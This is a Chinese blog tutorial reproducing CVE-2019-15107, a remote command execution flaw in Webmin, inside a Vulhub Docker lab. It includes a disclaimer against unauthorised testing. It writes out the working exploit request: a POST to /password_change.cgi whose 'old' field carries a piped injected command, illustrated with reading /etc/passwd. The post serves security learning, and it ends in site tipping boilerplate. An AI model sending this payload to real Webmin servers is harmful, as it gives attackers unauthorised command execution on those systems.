CVE-2019-15107 webmin RCE漏洞复现

今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建

CVE-2019-15107漏洞是webmin系统存在的RCE漏洞编号。webmin是一个用于Unix系统管理的Web页面,通过webmin,用户可以使用Web浏览器来管理系统的各项设置。
为了复现CVE-2019-15107漏洞,我们首先需要搭建漏洞环境。我们使用Vulhub来搭建漏洞环境,安装完Vulhub后,进入如下所示的目录(目录根据不同的安装而不同):
在这里插入图片描述
执行命令:

docker-compose up -d

可以远程下载该漏洞Docker虚拟环境,并且创建一个环境。该命令执行结果如下所示:
在这里插入图片描述
之后,我们执行命令:

docker-compose config

即可查看该Docker虚拟环境,该命令执行结果如下所示:
在这里插入图片描述
这样,我们就可以使用浏览器访问该漏洞环境了,访问结果如下所示:
在这里插入图片描述

二、CVE-2019-15107 webmin RCE实战

接下来,我们就需要进行CVE-2019-15107 webmin 的RCE漏洞实战了。我们在该页面中随便抓一个数据包如下所示:
在这里插入图片描述
接下来,我们将该数据包的第一行更换为如下内容:

POST /password_change.cgi HTTP/1.1

接下来,我们将该数据包的最后一行更换为如下内容:

user=rootxx&pam=&expired=2&old=test|【放入要执行的命令】&new1=test2&new2=test2

然后发送数据包后,可以看到在数据包的回显中,出现了我们插入的cat /etc/passwd命令的结果,相关结果如下所示:
在这里插入图片描述
从上图中可以看出,CVE-2019-15107 webmin RCE漏洞复现成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值